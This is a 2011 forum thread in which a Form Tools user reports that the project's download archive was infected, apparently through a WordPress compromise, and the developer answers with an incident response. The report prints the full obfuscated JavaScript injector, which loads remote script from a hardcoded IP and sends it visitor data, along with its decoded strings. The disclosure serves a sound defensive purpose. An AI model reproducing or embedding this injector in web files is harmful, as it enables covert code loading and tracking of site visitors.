+- Form Tools (https://forums.formtools.org)
+-- Forum: Form Tools (https://forums.formtools.org/forumdisplay.php?fid=1)
+--- Forum: Installation (https://forums.formtools.org/forumdisplay.php?fid=4)
+--- Thread: Download of latest version infected (/showthread.php?tid=1805)
Download of latest version infected - __diz__ - Dec 9th, 2011
Hi Ben
Please check the latest download of formtools. It is infected with a encoded javascript. I guess it has happened through Wordpress during the last two days. The version from 6.12. I downloaded also was not infected.
You can check witthin the archive e.g.
formtools\global\codemirror\js\tokenizejavascript.js
In this (and others) you will find:
var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;
The script will be decoded and try to connect a russian server.
I have decoded it to:
["sc_co","getElementById","colorDepth","width","height","charset","location","referrer","userAgent","script","createElement","id","src","http://91.196.216.64/s.php?ref=","&cls=","&sw=","&sh=","&dc=","&lc=","&ua=","head","getElementsByTagName","appendChild"]
I don't know exactly what the script does. It is evident that it is trying to contact http://91.196.216.64, perhaps to reload code. This does also happen on your site.
Usefule information can be found at: http://dan.cx/blog/2011/11/pulling-apart-wordpress-hack
Please check!!
Regards Dirk
RE: Download of latest version infected - Ben - Dec 9th, 2011
Hi Diz,
Thank you SO much for reporting this. I took everything offline this morning and I'm still investigating.
That link you posted does help a little, but the actual source of the hack is different. It's definitely a Wordpress-related flaw, but I haven't been able to identify where it originally stems from on my site: the PHP code they mention isn't anywhere to be found.
I'll post more when I know something more concrete.
- Ben
RE: Download of latest version infected - Ben - Dec 9th, 2011
Hi Dirk,
I've made a post outlining the problem, why it happened, who's affected and how to fix:
http://www.formtools.org/wordpress/?p=599
I'm going to be spending the next few days examining every last nook and cranny of the site (as well as replacing my Wordpress installation with a totally new one) to prevent this from happening again.
- Ben
RE: Download of latest version infected - __diz__ - Dec 10th, 2011
Hi Ben
I'am glad that I could help. Formtools is a very stable and innovative tool. Such a hack can happen to everybody handling php on his site and has nothing to do with Formtools itself as a script. As I can see, you have investigated in detail and take very quick actions to inform the users. That's not self-evident for every developer. All webmasters who uses active scripts must always have an eye on security, so don't worry too much about the inconvenience you might have caused. Thanks for your information and actions.
Kind Regards
Dirk
(Dec 9th, 2011, 2:07 PM)Ben Wrote: Hi Dirk,
I've made a post outlining the problem, why it happened, who's affected and how to fix:
http://www.formtools.org/wordpress/?p=599
I'm going to be spending the next few days examining every last nook and cranny of the site (as well as replacing my Wordpress installation with a totally new one) to prevent this from happening again.
- Ben